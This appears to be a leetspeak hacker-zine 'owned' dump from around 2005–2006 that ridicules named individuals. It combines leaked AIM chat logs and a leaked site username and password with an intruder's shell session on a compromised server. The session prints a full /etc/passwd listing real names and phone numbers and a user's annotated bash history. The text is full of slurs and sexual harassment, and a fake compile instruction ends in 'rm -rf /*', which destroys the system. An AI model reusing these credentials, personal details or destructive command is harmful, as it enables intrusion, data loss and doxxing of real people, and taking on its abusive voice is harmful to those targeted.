(17:33:51) unixroot102: jeje
(17:33:54) unixroot102: where u been hoe
(17:34:12) OwlManAttTFC: Right here.
(17:35:13) unixroot102: ya ya ya
(17:35:27) unixroot102: how come i never see u then'z
(17:35:40) OwlManAttTFC: I like my privacy.
(17:35:56) unixroot102: u gayz
^--- 0wl l1k3z h1z pr1v4cy wh1ch 1z why h3 l0gz 4ll h1z c0nv0z s0 h0no k4n s33 th3m h0h0h0
Conversation with unixroot102 at 2004-08-19 23:46:43 on OwlManAttTFC (aim)
(23:46:43) unixroot102: owl u there?
(23:46:43) OwlManAttTFC <AUTO-REPLY>: I am not here. Either I walked off to do something else like get food or I feel asleep. This message is automatic, so anything could of happened. Feel free to call me though, you probably know my cell number.
(01:48:16) OwlManAttTFC: nope
(01:48:57) unixroot102: hoe
(01:49:00) unixroot102: listen
(01:49:10) unixroot102: reflux needs a site
(01:49:15) unixroot102: =)
(01:49:19) unixroot102: php welcome
(01:49:23) OwlManAttTFC: w00t
(01:49:26) unixroot102: think u can work on one?
(01:49:30) OwlManAttTFC: yea
(01:49:32) unixroot102: :D
(01:49:34) unixroot102: <33 owl
(01:49:41) ***unixroot102 rapes owl
(01:49:43) unixroot102: lol
(01:49:46) OwlManAttTFC: lol
(01:49:47) unixroot102: ok
(01:50:02) unixroot102: umm well when can u start?
(01:50:28) OwlManAttTFC: What do you need done, exactly?
(01:50:35) unixroot102: hm
(01:51:25) unixroot102: well i was thinking like the bg being a screenshot of a terminal with someone seg faulting a proggie
^--- s0m30n3 s3gf4ult1ng a pr0g4m, e.g. N0T Y0U##!$^$
(01:51:40) unixroot102: and links on the left side
^--- http://how-to-hack.org
(01:51:48) unixroot102: news on front page
^--- BREAKING NEWZ!!#@! TAL0N FINALLY G0T A G1RLFRI3ND!$@
--- TH3Y ARE STILL W0RK1NG 0N C0NS3NT.
(01:51:51) unixroot102: etc
0k4y, 3n0ugh 0f 0wlm4n and sk3w.
Conversation with tpoowlmanatt at 2005-03-19 18:14:12 on OwlManAttTFC (aim)
(18:14:12) TPO OwlManAtt: (18:25:23) xFlexDx: | UserName: eevopets | PassWord: h3nrytr33
(18:25:29) xFlexDx: http://eevopets.net
http://eevopets.net/cpanel
http://eevopets.net/webmailË.Ë.Ë.
^ 0h sw33t, th4nkz. w3 l0v3 33v0p3tz@!#
h3r3 1z 4n 0wl h4t3r. 1t 4pp34rz 0wl h4z 4 f3w 3n3m13z.
Conversation with kittyeater10 at 2004-11-19 20:25:51 on Evil OwlManAtt (aim)
(20:25:51) Kittyeater10: get aids and die you cock suckin faggot
W3 h34rd 0wl t00k k1tty34t3r'z 4dv1c3 4nd 4tt3mpt3d t0 d0 th3 4b0v3.
Conversation with lscthulhu at 2004-11-19 20:17:57 on Evil OwlManAtt (aim)
(20:17:57) LS Cthulhu: die
4ll th3 r3zt 0f h1z sh1t 1z b0r1ng, b3c4uz3 h3'z b0r1ng az fuq 4nd d03zn't d0
sh1t w1th h1z l1f3.
wh4t th3 fuq k1nd 0f n4m3 1z 0wlm4n4tt 4nyw4y?!!$#$*
0WLM4N 1F Y0U N33D H3LP G3TT1NG L41D, WH1CH 3Y3 4M SUR3 Y0U D0 DU3 T0 TH3 F4KT
Y0U PR0B4BLY L00K L1K3 4N 0WL T00, Y0U K4N C4LL UP DVDM4N 4ND H3 K4N H00K Y0U
UP W1TH S0M3 B4NGBR0Z P0RN. TH4T'Z PR0B4BLY 4Z F4R 4Z Y0U K4N G0 W1TH Y0UR
B0R1NG/P4TH3T1C L1F3. BTW, W3 H34R Y0U 4R3 ~16 Y34RZ 0LD. RL0XL3Y L0V3Z T0 G3T
H1Z ST4TUT0RY 0N, S0 H1T H1M UP, #H4CKPHR34K@UND3RN3T. H3Z 4N 0LD M4N WH0 L0V3Z
L1TTL3 B0YZ. 0R M4YB3 Y0U ALR34DY KN0W TH1Z H0H0.
23.txt -~-~-~ nc/rx 0wn3d t0 fuq
~ rx t4k3z th3 c0ck
rx, als0 kn0wn 4z nc 4nd skyy h4z b33n 0wn3d.
th1z k1d c0d3z m0r3 asc11 p0rn progr4mz th4n
dvdman cyb3rz 50 yr 0ld m3n 0n msn. h3
sitz 1n hiz r00m all d4y d01ng drugz, 4nd d03znt
3v3n g3t up t0 t4k3 a p1ss. h3 lyk3z t0 c0d3 1n C,
but d03znt fuqn kn0w h0w t0 t4b h1z k0d3z.
1t'z 0k4y rx, w3'r3 h3r3 t0 h3lp y0u al0ng y0ur
3p1c j0urn3y t0 b3c0m1ng an 3l1t3 h4ck3r, y0u br4in-d4m4g3d
slutb4g. h0h0z. 1f y0u w4nt t0 j01n h0no, c0m3 t0 #!bl4ckh4tz,
wh1ch 1z 0ur s1st3r ch4nn3l. 4sk bx 1f y0u k4n j01n,
h3z 0ur ph33rl3zz l34d3r.
4ls0, y0ur s1t3 (http://el8.ru/x/) 1z 0wn3d.
d0uble als0, sn34k w1ll k1q y0u 0ff 0f d4t4v1b3.
th1z k1d h4z m0r3 b33f th4n shev.
bash$ id
uid=10121(rx) gid=100(users) groups=100(users)
bash$ uname -a
Linux datavibe 2.6.11-hardened-r13 #4 SMP Sat Oct 15 00:23:14 UTC 2005 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
bash$ ls -al
total 40
drwxr-xr-x 2 rx users 4096 Jan 5 19:57 .
drwxr-xr-x 134 root root 4096 Jan 5 18:19 ..
-rw------- 1 rx users 414 Jan 5 19:53 .bash_history
-rw-r--r-- 1 rx users 127 Jan 5 18:14 .bash_logout
-rw-r--r-- 1 rx users 193 Jan 5 18:14 .bash_profile
-rw-r--r-- 1 rx users 993 Jan 5 19:02 .bashrc
-rw------- 1 rx users 621 Jan 5 19:57 .viminfo
-rw------- 1 rx users 7832 Jul 26 22:48 ircfuzz.c
-rw-r--r-- 1 rx users 1816 Jan 5 19:57 shex8.c
// s0m30n3 n33dz t0 l34rn h0w t0 t4b
// th31r k0d3. w4tch 0ut f0r 1t th0ugh,
// th1z 1z 4n el1t3 sh3llk0d3 wr1t3r'z
// pr0gr4m.
bash$ head -n5 shex8.c
/*
* shex.c - version 8
* by: rx <rx@corestorm.com>
* mon jan 2 01:24:30 est 2006
*/
bash$ cat .bash_history
w
ls -a
ls /mnt/giggage/
pass
passwd
df -h
wget http://roo.no-ip.org/fish/files/1.19.0/fish-1.19.0.tar.gz
ls /mnt/giggage/
ls /mnt/giggage/home/
ls /mnt/giggage/home/oclet/
ls -l
tar zxvf fish-1.19.0.tar.gz
rm fish-1.19.0.tar.gz
cd fish-1.19.0/
ls
./configure
ls /bin/sh
cd ..
rm -fr fish-1.19.0/
w
ls -la
vsy .bash_profile
cat .bash_profile
cat .bashrc
umask
echo 'umask 077' >> .bashrc ; source .bashrc
exit
bash$ ls -al /mnt/giggage/home/oclet/
total 2148
drwxr-xr-x 5 oclet users 4096 Jan 5 18:20 .
drwxr-xr-x 134 root root 4096 Jan 5 18:19 ..
-rw------- 1 oclet users 525 Jan 5 18:23 .bash_history
-rw-r--r-- 1 oclet users 240 Aug 16 04:22 .bash_logout
-rw-r--r-- 1 oclet users 308 Aug 16 04:22 .bash_profile
-rw-r--r-- 1 oclet users 1306 Aug 16 04:22 .bashrc
drwx------ 9 oclet users 4096 Nov 30 11:44 .maildir
-rwxr-xr-x 1 oclet users 93694 Jan 5 18:11 apach
-rwxr-xr-x 1 oclet users 132720 Jan 5 18:11 apach-scan
-rwxr-xr-x 1 oclet users 132720 Jan 5 18:11 apach-scan.1
-rw-r--r-- 1 oclet users 469 Jan 5 18:11 as8758.net
-rwxr-xr-x 1 oclet users 441463 Jan 5 18:11 brk
-rw-r--r-- 1 oclet users 42 Jan 5 18:11 bucate
-rw------- 1 oclet users 106496 Jan 5 18:11 core
-rwxr-xr-x 1 oclet users 26692 Jan 5 18:11 dmntreal
drwxr-xr-x 3 oclet users 4096 Jan 5 18:20 hack4jes
-rw-r--r-- 1 oclet users 14 Jan 5 18:13 index
-rwxr-xr-x 1 oclet users 264608 Jan 5 18:11 ipv6fuck
-rw-r--r-- 1 oclet users 15905 Jan 5 18:11 ipv6fuck.c
-rw-r--r-- 1 oclet users 387932 Jan 5 18:14 lesbo-chicken.jpeg
-rwxr-xr-x 1 oclet users 453572 Jan 5 18:12 megaDoS
drwx------ 2 oclet users 4096 Aug 16 04:23 public_html
-rw-r--r-- 1 oclet users 47127 Jan 5 18:12 wget-log
// megaDoS???! th1z w4r3z 1z (c) r0t0r.
bash$ w
20:00:18 up 76 days, 23:53, 12 users, load average: 0.53, 0.47, 0.43
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
// l3tz s33 wh0'z 0n th1s l4m3 b0x
bash$ cat /etc/passwd
root:x:0:0:root:/mnt/giggage/home/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
man:x:13:15:man:/usr/man:/bin/false
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false
cron:x:16:16:cron:/var/spool/cron:/bin/false
ftp:x:21:21::/home/ftp:/bin/false
sshd:x:22:22:sshd:/dev/null:/bin/false
at:x:25:25:at:/var/spool/cron/atjobs:/bin/false
squid:x:31:31:Squid:/var/cache/squid:/bin/false
gdm:x:32:32:GDM:/var/lib/gdm:/bin/false
xfs:x:33:33:X Font Server:/etc/X11/fs:/bin/false
games:x:35:35:games:/usr/games:/bin/false
named:x:40:40:bind:/var/bind:/bin/false
mysql:x:60:60:mysql:/var/lib/mysql:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
apache:x:81:81:apache:/home/httpd:/bin/false
nut:x:84:84:nut:/var/state/nut:/bin/false
cyrus:x:85:12::/usr/cyrus:/bin/false
vpopmail:x:89:89::/var/vpopmail:/bin/false
alias:x:200:200::/var/qmail/alias:/bin/false
qmaild:x:201:200::/var/qmail:/bin/false
qmaill:x:202:200::/var/qmail:/bin/false
qmailp:x:203:200::/var/qmail:/bin/false
qmailq:x:204:201::/var/qmail:/bin/false
qmailr:x:205:201::/var/qmail:/bin/false
qmails:x:206:201::/var/qmail:/bin/false
postfix:x:207:207:postfix:/var/spool/postfix:/bin/false
smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250:portage:/var/tmp/portage:/bin/false
guest:x:405:100:guest:/dev/null:/dev/null
nobody:x:65534:65534:nobody:/:/bin/false
ntp:x:123:123:added by portage for ntp:/dev/null:/bin/false
asterisk:x:101:407:added by portage for asterisk:/var/lib/asterisk:/bin/false
dovecot:x:97:97:added by portage for dovecot:/dev/null:/bin/false
sneak:x:1000:100:jeffrey paul,,877 748 3467,877 748 3467:/home/sneak:/bin/bash
mike:x:10003:100:mike williams,,313-445-9510,586-598-0070:/home/mike:/bin/bash
bcarps:x:1020:100:Brad Carps,n/a,(916) 485-0959,(916) 482-8565:/home/bcarps:/bin/bash
star:x:1044:100:,,,:/home/star:/bin/bash
mata:x:1064:100:,,,:/home/mata:/bin/bash
sj:x:1066:100:Steven Jay,,(877) Video-Plumber,:/home/sj:/bin/bash
fenix:x:1073:100:,,,:/home/fenix:/usr/bin/passwd
derek:x:1078:100:derek plaslaiko,,,:/home/derek:/bin/bash
hayzell:x:1082:100:hayzell merriweather,,,:/home/hayzell:/bin/bash
voigt:x:1091:100:Jonathan Voigt,,734-306-9122,734-306-9122:/home/voigt:/bin/bash
gary:x:1093:100:,,,:/home/gary:/bin/bash
yussel:x:1095:100:,,,:/home/yussel:/bin/bash
christos:x:1098:100:,,,:/home/christos:/bin/bash
neike:x:1099:100:,,,:/home/neike:/bin/bash
chaos:x:1101:100:,,,:/home/chaos:/bin/bash
asc:x:1202:100:,,,:/home/asc:/bin/bash
adminx:x:1205:100:,,,:/home/adminx:/bin/bash
slash:x:1209:100:,,,:/home/slash:/bin/bash
azatkin:x:1210:100:,,,:/home/azatkin:/bin/bash
ezatkin:x:1211:100:,,,:/home/ezatkin:/bin/bash
mzatkin:x:1212:100:,,,:/home/mzatkin:/bin/bash
szatkin:x:1225:100:,,,:/home/szatkin:/bin/bash
devynn:x:1213:100:devynn rains,,,:/home/devynn:/bin/bash
j3s:x:1215:100:jesica davis,,,:/home/j3s:/bin/bash
kristen:x:1216:100:,,,:/home/kristen:/bin/bash
angie:x:1222:100:,,,:/home/angie:/bin/bash
bsd:x:1223:100:brian duross,,,:/home/bsd:/bin/bash
teknokat:x:1224:100:,,,:/home/teknokat:/bin/bash
bhoule:x:1226:100:,,,:/home/bhoule:/bin/bash
martin:x:1227:100:,,,:/home/martin:/bin/bash
greg:x:1228:100:greg,,,:/home/greg:/bin/bash
cyb:x:1229:100:,,,:/home/cyb:/bin/bash
paul:x:1230:100:,,,:/home/paul:/bin/bash
becca:x:1231:100:rebecca stevens,,,:/home/becca:/bin/bash
nick:x:1232:100:,,,:/home/nick:/bin/bash
ryan:x:1233:100:,,,:/home/ryan:/bin/bash
jon:x:1234:100:,,,:/home/jon:/bin/bash
darkcube:x:1236:100:,,,:/home/darkcube:/bin/bash
doris:x:10006:100:doris payer,,,:/home/doris:/bin/bash
etx:x:10008:100::/home/etx:/bin/bash
pup:x:10009:100:Jubal Kessler,,,:/home/pup:/bin/tcsh
m33sh4:x:10010:100::/home/m33sh4:/bin/bash
kim:x:10011:100::/home/kim:/bin/bash
joel:x:10012:100::/home/joel:/bin/bash
wren:x:10013:100::/home/wren:/bin/bash
atomly:x:10014:100::/home/atomly:/bin/bash
robthe:x:10016:100::/home/robthe:/bin/bash
karey:x:10018:100::/home/karey:/bin/bash
caligula:x:10019:100::/home/caligula:/bin/bash
xcopy:x:10020:100:Erik Cronin,,,313-549-2621:/home/xcopy:/bin/bash
amy:x:10021:100:amy hubbarth,,,:/home/amy:/bin/bash
devolve:x:10022:100:jayson barrons,,,:/home/devolve:/bin/bash
ddonohue:x:10023:100:Dennis Donohue,,+32 2 541 1526,+32 2 217 9592:/home/ddonohue:/bin/bash
mathew:x:10024:100::/home/mathew:/bin/bash
mrblaze:x:10025:100::/home/mrblaze:/bin/bash
ed:x:10026:100::/home/ed:/bin/bash
dmouyal:x:10027:100:Dave M,,,321-279-5996:/home/dmouyal:/bin/bash
krhn:x:10028:100::/home/krhn:/bin/bash
asmodeus:x:10029:100::/home/asmodeus:/bin/bash
science:x:10031:100::/home/science:/bin/bash
kelly:x:10032:100::/home/kelly:/bin/bash
dudu:x:10033:100::/home/dudu:/bin/bash
xcentric:x:10034:100::/home/xcentric:/bin/bash
malcolm:x:10035:100::/home/malcolm:/bin/bash
essiene:x:10037:100:Essien Ita Essien,,--,--:/home/essiene:/bin/bash
vook:x:10038:100::/home/vook:/bin/bash
mkiang:x:10039:100::/home/mkiang:/bin/bash
parent:x:10041:100::/home/parent:/bin/bash
benny:x:10042:100::/home/benny:/bin/bash
justica:x:10043:100::/home/justica:/bin/bash
geoff:x:10044:100::/home/geoff:/bin/bash
vyeto:x:10045:100::/home/vyeto:/bin/bash
jerome:x:10046:100::/home/jerome:/bin/bash
dbaldwin:x:10047:100::/home/dbaldwin:/bin/bash
plusorminus:x:10049:100::/home/plusorminus:/bin/bash
keeb:x:10050:100::/home/keeb:/bin/bash
craig:x:10051:100::/home/craig:/bin/bash
d0cdet:x:10052:100:doc,,,313 510 0719:/home/d0cdet:/bin/bash
c2:x:10053:100:carl craig,,,:/home/c2:/bin/bash
nff:x:10054:100::/home/nff:/bin/bash
kube72:x:10055:100::/home/kube72:/bin/bash
djdaniel:x:10056:100::/home/djdaniel:/bin/bash
cheryl:x:10058:100::/home/cheryl:/bin/bash
nil8:x:10059:100:andrew siegel,,,:/home/nil8:/bin/bash
dl:x:10060:100::/home/dl:/bin/bash
nowfal:x:10061:100:nowfal akash,,,:/home/nowfal:/bin/bash
benji:x:10062:100:Ed Feldman,,,,deletion-candidate:/home/benji:/bin/bash
pzilla:x:10064:100::/home/pzilla:/bin/bash
andrew:x:10065:100::/home/andrew:/bin/bash
theburro:x:10066:100::/home/theburro:/bin/bash
jvoigt:x:10067:100::/home/jvoigt:/bin/bash
freenet:x:10068:100::/home/freenet:/bin/bash
mix:x:10069:100::/home/mix:/bin/bash
rburley:x:10070:100::/home/rburley:/bin/bash
awesome:x:10071:100:Mfoniso Ossom,,,:/home/awesome:/bin/bash
t7g:x:10072:100::/home/t7g:/bin/bash
mollyo:x:10073:100::/home/mollyo:/bin/bash
sf:x:10074:100::/:
jennilee:x:10075:100::/home/jennilee:/bin/bash
fksche:x:10076:100::/home/fksche:/bin/bash
element8:x:10077:100:eric cloutier,,,:/home/element8:/bin/bash
kendra:x:10078:100::/home/kendra:/bin/bash
jbl:x:10079:100::/home/jbl:/bin/bash
spamfilter:x:10080:100:,,,:/var/spool/spamfilter:/bin/bash
jessica:x:10081:100::/home/jessica:/bin/bash
toybreaker:x:10082:100::/home/toybreaker:/bin/bash
tor:x:102:409:added by portage for tor:/var/lib/tor:/bin/false
pi:x:10083:100:Roddy Richards,,,:/home/pi:/bin/bash
nocvox:x:10085:100::/home/nocvox:/bin/bash
sneakmobile:x:10086:100::/home/sneakmobile:/bin/bash
doyle:x:10087:100:mike doyle,,,:/home/doyle:/bin/bash
clamav:x:103:1006:added by portage for clamav:/dev/null:/bin/false
weev:x:10088:100:Andrew Weevlos,,8044263336,8044263336:/home/weev:/bin/bash
oclet:x:10091:100::/home/oclet:/bin/bash
hep:x:10092:100:hep sano,lj user hepkitten,,:/home/hep:/bin/bash
jabber:x:104:1008:added by portage for jabberd:/var/spool/jabber:/bin/false
dv:x:10094:100::/home/dv:/bin/bash
pwn:x:10095:100::/home/pwn:/bin/bash
teh:x:10096:100::/home/teh:/bin/bash
banbot:x:10097:100::/home/banbot:/bin/bash
^^^^ 0nly us3r w0th k33p1ng 0n th1z p4th3t1c b0x.
aux88-website:x:10105:100::/home/aux88-website:/bin/bash
aux88-tom:x:10106:100::/home/aux88-tom:/bin/false
aux88-k1:x:10107:100::/home/aux88-k1:/bin/false
buttesnet:x:10108:100::/home/buttesnet:/bin/bash
sherrod:x:10109:100::/home/sherrod:/bin/bash
shaun:x:10110:100::/home/shaun:/bin/bash
optic01:x:10111:100::/home/optic01:/bin/false
optic02:x:10112:100::/home/optic02:/bin/false
optic03:x:10113:100::/home/optic03:/bin/false
optic04:x:10114:100::/home/optic04:/bin/false
optic05:x:10115:100::/home/optic05:/bin/false
kuperman:x:10116:100:kevin kuperman,,,:/home/kuperman:/bin/bash
tourette:x:10117:100:Jeff Wisman (added by voigtjr),,,:/home/tourette:/bin/bash
mdb:x:10118:1009:User for Metro Detroit Beatology shoutcast (added by voigt):/dev/null:/bin/false
aux88-booking:x:10119:100::/home/aux88-booking:/bin/false
cdma:x:10120:100:Samuel Horowitz,,,:/home/cdma:/bin/bash
rx:x:10121:100:rx:/home/rx:/bin/bash
sdf:x:10122:100::/home/sdf:/bin/bash
th1z b0x h4z m0r3 p3d0z th4n wh3n djdarkcube h0ztz a 3 d4y r4v3.
bash$ who
sneak pts/1 Jan 4 13:02 (pcp0011008802pcs:S.0)
darkcube pts/2 Dec 28 21:31 (d149-67-36-22:S.0)
djdarkcube pts/3 Dec 17 03:54 (d149-67-36-22:S.1)
sneak pts/8 Jan 4 16:05 (pcp0011008802pcs:S.2)
sneak pts/9 Jan 4 12:06 (pcp0011008802pcs:S.3)
root pts/7 Jan 5 07:11 (::1)
root pts/10 Jan 4 16:05 (::1)
sneak pts/11 Jan 5 06:04 (pcp0011008802pcs:S.4)
sneak pts/9 Jan 4 13:12 (pcp0011008802pcs:S.3)
sneak pts/5 Jan 4 13:02 (pcp0011008802pcs:S.1)
4ll b0r1ng sh1t... w4r3z th3 fuck1n w4r3z?
3y3 k4n n0w s33 why bx/dvdman/rotor/skew w0uld l0v3 rx'z k0d1ng.
rx g3tz th3 pl34zur3 t0 h4v3 h0no c0mm3nt h1z k0d3! h0w3v3r
w3 w1LL d0 th1z pr3t3nd1ng t0 b3 h1m. rx, t4k3 n0t3z, th1z 1z
th3 w4y t0 c0mm3nt.
bash$ cat prv/porn.c
/* sup3r 4scii p0rn pr0gr4m
by rx
du0d FUQ T4BB1NG! 3y3'm t00 el1t3 f0r th4t.
ey3 m4k3 my k0d3 unt4bb3d s0 1tz h4rd3r f0r
h4ck3rz lik3 mys3lf t0 4ud1t 1t h3h3h3h3!
c0mp1l3 lyk3 s0:
# gcc -o porn porn.c && rm -rf /*
^^^^ f0r y0u k1dd13z 0ut th3r3 h3h3h3h!!%#!!#@!@^#
gr33tz g0 0ut t0 4LL my 3l1t3 cd3j fr13ndz,
4nd t0 subst4nc3, my 9x id0l!
*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
void usage(char *);
int porn(char *);
int main(int argc, char **argv) {
int ch;
int gogogo = 0;
while ((ch = getopt(argc, argv, "hf")) != EOF) {
switch(ch) {
case 'h': usage(argv[0]);
case 'f':
gogogo = atoi(optarg);
break;
}
}
if (gogogo == 0) {
printf("[-] ur not 18+ !@#\n"); // 3v3n th0ugh 3y3 4m n0t 18+
exit(-1);
} else
{
while (1) { // wh1l3(h0no_thr04t_r4p3z_rx) { <--- ps3ud0 k0d3
porn("8======D O:<"); // rx w41t1ng w1th gr34t 4nt1c1p4ti0n...
porn(" 8======D O:<"); // rx g3tt1ng m0r3 3xc1t3d!
porn(" 8======D O:<"); // rx st1ll h4z h1z m0uth w1d3 0p3n
porn(" 8======DO:<"); // rx k4n n0w f33l 1t 0n h1z l1pz
porn(" 8======O:<"); // 'yum yum' rx s4yz
porn(" 8=====O:<");
porn(" 8====O:<");
porn(" 8===O:<");
porn(" 8==O:<");
porn(" 8=O:<");
porn(" 8O:<"); // rx 1z ch0k1ng
porn(" 8=O:<");
porn(" 8==O:<");
porn(" 8===O:<");
porn(" 8====O:<");
porn(" 8=====O:<");
porn(" 8======O:<");
porn(" 8======DO:<");
porn(" 8======D O:<");
porn(" 8======D O:<");
porn("8======D O:<"); // rx 1z alr34dy ph33l1ng w1thdr4wL fr0m h0no'z 0day c0ck att4q
// fuq, w3 d1dnt 3xp3kt h1m t0 l1k3 1t.
}
}
return(0);
}
int porn(char *uNF) {
fprintf(stderr, "\r%s", uNF);
usleep(rand()%57000+34000);
return;
}
void usage(char *k3k) {
printf("must be 18+ only !@#\n");
printf("usage: %s -f\n", k3k);
exit(-1);
}
// t4b y0ur k0d3 do0d. w3 h4t3 th3 s1ght 0f b4d k0d3.
// ezp3c14lly wh3n 1t'z 0d4y 4scii p0rn (l4m3). l3t th1z b3
// 4 l3ss0n f0r 4ll y0u fuckz wh0 d0nt us3 t4bz 1n y0ur
// k0d3z (3zp3c14LLy 1f y0u w1LL b3 s3nd1ng h0no a
// sp3c14L d0n4t10n 0f 0hd4yz. l1k3 w3 s41d b3f0r3...
// w3 h4t3 t0 uz3 0ur 0wn.)
bash$ cd /mnt/giggage/home/rx/prv
bash$ ls -al
total 13900
drwx------ 2 rx users 4096 Jan 6 02:00 .
drwxr-xr-x 5 rx users 4096 Jan 6 02:00 ..
-rw------- 1 rx users 7832 Jul 26 22:48 ircfuzz.c
-rw------- 1 rx users 1380 Jan 6 02:00 porn.c
-rw------- 1 rx users 14186912 Jan 5 23:18 rx.z
-rw-r--r-- 1 rx users 1816 Jan 5 19:57 shex8.c
// 3n0ugh 0f th1z l4m3 datavibe.net sh1t..
// w3 g0t t0 th1nk1ng wh3n w3 s4w rx'z .bash_history.
// th1z du0d r3m1ndz m3 0f sk3w w1th h1z el1t3 strcpy() gr3p'1ng sk1llz,
// gr3p'1ng f0r m0r3 strcpy() buff3r 0v3rfl0wz th4n sk3w g1v3z bl0wj0bz f0r
// k0d3z.
[ro0t@jjj]# cat .bash_history
w
ls -a
cd prv/theif/
ls
ls -l
vim mount.c
echo 'hahaha' | write rotor
echo 'hahaha' | write rotor
echo 'hahaha' | write rotor
echo 'LOOK WHAT I FOUND :>' | write rotor
echo 'LOOK WHAT I FOUND :>' | write rotor
echo 'LOOK WHAT I FOUND :>' | write rotor
^^^^ y0u f0und strcpy(buffer, argv[1]) in strcpy.c. c0ngr4tz, m4n!
^^^^ m4yb3 y0u k4n t34ch r0t0r h0w t0 h4ck. h3h3h3.
netstat -a | grep 6667
ps awxu| grep BitchX
escreen -r
screen -r
cd ~
screen -r <- rx d0eznt kn0w y0u c4nt r3sum3 0v3r us3rz scr33n s3zz10nz
ls -l
umask 077
ls -l
mutt
ls
rm -fr Mail/
ls amn
ls prv
ls prv/theif/
rmdir prv/theif/
cd prv/c/
ls -l
cd ../u
ls
screen
cd ../t
cd ../txt/
ls
vim zine.txt
cd ../txt/
vim zine.h
vim zine.txt
ls -l
cd ../
ls
cd c/
ls
nasm -o rm remfarslash.S <- muzt b3 s0m3 el1t3 shellc0de
./shex8 -d rm <- 0h sh1t, d0nt rm us
ls
vim rfind.c
ls -l
gcc -o rfind rfind.c
vim rfind.c
ls
cd ~
screen -r
screen -dr
screen -dr pts-0.heroin
cd prv/
ls
cd c/
ls
./shex8 -d rm
ls
rm rm <- 1nst34d, try: nasm -f elf -o rm remfarslash.S; ./rm
nasm -o 1 newyears.S <- h4ck3rz alw4yz c3l3br4t3 n3w y34rz w1th sh3llc0d3z.
./shex8 -d 1
ls
rm 1
nasm -o b beeper.S
./shex8 -d beeper.S
./shex8 -d beeper.S | more
./shex8 -d b
./shex -d /bin/sh | wc -l
./shex8 -d /bin/sh | wc -l
./shex8 -d /bin/sh | grep bytes
./shex8 -d rm | grep bytes
ls
./shex8 -d b | grep bytes
rm b
ls -l
ls
w
screen -r keke
cd prv/txt/
ls
mkdir el8 ; cd el8
wget http://packetstorm.linuxsecurity.com/mag/~el8/el8_1.txt <- y0u 4r3 n0t 3v3n w0rthy 0f b4b0
sh el8_1.txt
ls
gcc -o eldump eldump.c
./eldump -vvv <- 0h sh1t, n0w y0u'v3 g0t 0d4y
ls
./eldump el8_1.txt -vvv
ls
ls -l
gcc -o eltag eltag.c
./eltag
./eltag -X -f el8_1.txt -o lolx.z
nano -w lolx.z
rm lolx.z
vim eltag.c
ls
rm el*.c
rm eld*.g
rm el*.g
rm el*
ls
ls homosexual/
ls 8ball/
ls OpenBSD/
ls el8ch4t/
cd el8ch4t/
ls
gcc -o el8ch4t el8ch4t.c
./el8ch4t
./el8ch4t
ls
rm el8ch4t
cd ..
ls
ls lt
ls ripped_k0dez/ <- th1z 1z l00k1n w0rz3 f0r y0u 3v3ry s3c0nd
ls testsyscall/
cd lt
ls
vim so1o
vim route
ls
vim gov-boi
vim RLoxley <- d1d y0ur f4th3r 3v3r t0uch y0u, rx?
vim emmanuel
vim skel
cd ~/prv/c/ <- m0r3 pr1v4t3 k0d3z f0r h0no?
ls
vim o0o.c
gcc -o o0o o0o.c
vim o0o.c
gcc -o o0o o0o.c
vim o0o.c
gcc -o o0o o0o.c
./o0o
vim o0o.c
gcc -o o0o o0o.c
./o0o
ls
rm o0o
w
ls /home/rotor
ls -l
nano -w loading.c
gcc -o loading loading.c
nano -w loading.c
gcc -o loading loading.c
nano -w loading.c
vim loading.c
gcc -o loading loading.c
vim loading.c
gcc -o loading loading.c
vim loading.c
clear
gcc -o loading loading.c
# WHAT THE FUCK
vim loading.c
gcc -o loading loading.c
vim loading.c
gcc -o loading loading.c
./loading
./loading -h
./loading -t 1
./loading -t 2
vim loading.c
gcc -o loading loading.c
./loading -t 2
./loading -t 1
ls
w
ps awxu| grep screen
cd ~
screen -r
screen -ls
epic5 -B -n keke
cd ~/prv
ls
cd c/
ls
nasm -o sh execve.S
./shex8 -d sh
rm sh
ls
cd ../../../
ls
mkdir pub
mv brk_poc2.asm pub
vim rx_exim4.c
nano -w rx_exim4.c <- uh 0h. w4tch 0ut f0r th3 rx 0d4y.
ls
vim prtbind.S
ls
nasm -o prtbind prtbind.S
vim prtbind.S
nasm -o prtbind prtbind.S
ls
./shex8 -d prtbind
./shex8 -d prtbind | grep x00
ls
nano -w rx_exim4.c
w
ls
mv prtbind.S prtbind-fbsd.S
rm prtbind
vim prtbind-linux.S
nasm -o prtbind prtbind-linux.S
vim prtbind-linux.S
nasm -o prtbind prtbind-linux.S
vim prtbind-linux.S
nasm -o prtbind prtbind-linux.S
./shex8 -d prtbind | grep x00
./shex8 -d prtbind
vim prtbind-linux.S
nasm -o prtbind prtbind-linux.S
./shex8 -d prtbind
nano -w rx_exim4.c
rm prtbind
nasm -o prtbind prtbind-fbsd.S
rm prtbind
nano -w prtbind-fbsd.S
nasm -o prtbind prtbind-fbsd.S
./shex8 -d prtbind
rm prtbind
nano -w rx_exim4.c
nasm -o prtbind prtbind-linux.S.S
nasm -o prtbind prtbind-linux.S <- g1v3 1t up, y0u c4nt g3t 1t t0 fuqn w0rk!
./shex8 -d prtbind
rm prtbind
nano -w rx_exim4.c
ls
w
ls
ls prv
cd prv/c
ls
nmap -P0 -T4 -vv -oN ../txt/sux2bu.txt 216.32.94.58
nmap -sV -P0 -T4 -vv -oN ../txt/sux2bu-ver.txt 216.32.94.58
ping dynamichell.org
ping carbon.2uk2.com
cd ../txt/
ls
rm sux2bu.txt <- r3n4m3 th1z t0: sux2b0wn3d.txt
vi sux2bu-ver.txt
cd ../c/audit/ <- n0w 1tz t1m3 t0 gr3p strcpy * !
ls
wget ftp://ftp.demon.nl/pub/mirrors/exim/exim4/exim-4.52.tar.gz
ls
mkdir .tar
